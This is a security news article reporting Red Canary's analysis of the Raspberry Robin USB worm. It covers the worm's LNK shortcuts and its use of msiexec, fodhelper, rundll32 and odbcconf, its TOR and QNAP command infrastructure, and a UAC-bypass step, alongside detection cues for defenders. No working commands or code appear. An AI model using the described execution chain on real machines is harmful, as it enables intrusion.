Credit: Red Canary
Wormable malware dubbed Raspberry Robin has been active since last September and is wriggling its way through USB drives onto Windows machines to use Microsoft Standard Installer and other legitimate processes to install malicious files, researchers have found.
Researchers at Red Canary Intelligence first began tracking the malicious activity in the fall when it began as a handful of detections with similar characteristics first observed in multiple customers’ environments by Jason Killam from Red Canary’s Detection Engineering team.
Once the worm spreads via a USB drive to someone’s machine, the activity relies on msiexec.exe to call out to its infrastructure–which is often comprised of QNAP devices–using HTTP requests that contain a victim’s user and device names, Red Canary’s Lauren Podber and Stef Rand wrote in a blog post published Thursday.
Researchers also observed Raspberry Robin use TOR exit nodes as additional command and control (C&C) infrastructure, they wrote. Eventually the worm installs malicious dynamic link library (DLL) files found on the infected USB.
While researchers first noticed Raspberry Robin as early as September 2021, most of the activity observed by Red Canary occurred during January of this year, researchers said.
Unanswered Questions
Though researchers observed various processes and executions by the malicious activity, they acknowledged that these observations have left a number of unanswered questions.
The team has not yet figured out how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this infection occurs offline or “otherwise outside of our visibility,” researchers said.
They also don’t know why Raspberry Robin installs a malicious DLL, although they believe it may be to attempt to establish persistence on an infected system–though there is not enough evidence to make this conclusive, researchers acknowledged.
However, the biggest question mark surrounding the worm is the objective of the threat actors behind it, researchers said.
“Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns,” they acknowledged.
Initial Access and Execution
Infected removable drives—typically USB devices—introduce the Raspberry Robin worm as a shortcut LNK file masquerading as a legitimate folder on the infected USB device, researchers said. LNK files are Windows shortcuts that point to and are used to open another file, folder, or application.
Soon after the infected drive is connected to the system, the worm updates the UserAssist registry entry and records execution of a ROT13-ciphered value referencing a LNK file when deciphered. For example, researchers observed the value q:\erpbirel.yax being deciphered to d:\recovery.lnk, they wrote.
Execution commences when Raspberry Robin uses cmd.exe to read and execute a file stored on the infected external drive, researchers said.
“The command is consistent across Raspberry Robin detections we have seen so far, making it reliable early evidence of potential [worm] activity,” they noted.
In the next phase of execution, cmd.exe typically launches explorer.exe and msiexec.exe. The former’s command line can be a mixed-case reference to an external device–a person’s name, like LAUREN V; or the name of the LNK file, researchers said.
The worm “also extensively uses mixed-case letters in its commands,” most likely to avoid detection, researchers added.
Secondary Execution
Raspberry Robin uses the second executable launched, msiexec.exe , to attempt external network communication to a malicious domain for command and control purposes, researchers revealed.
In several examples of the activity that researchers have observed, the worm has used msiexec.exe to install a malicious DLL file although, as mentioned before, they still aren’t certain what the purpose of the DLL is.
The worm also uses msiexec.exe to launch a legitimate Windows utility, fodhelper.exe, which in turn spawns rundll32.exe to execute a malicious command, they observed.
“Processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt,” researchers noted. As this is unusual behavior for the utility, this activity can be used to detect the presence of Raspberry Robin on an infected machine, they said.
The rundll32.exe command then starts another legitimate Windows utility– odbcconf.exe–and passes in additional commands to execute and configure the recently-installed malicious DLL file, researchers said.
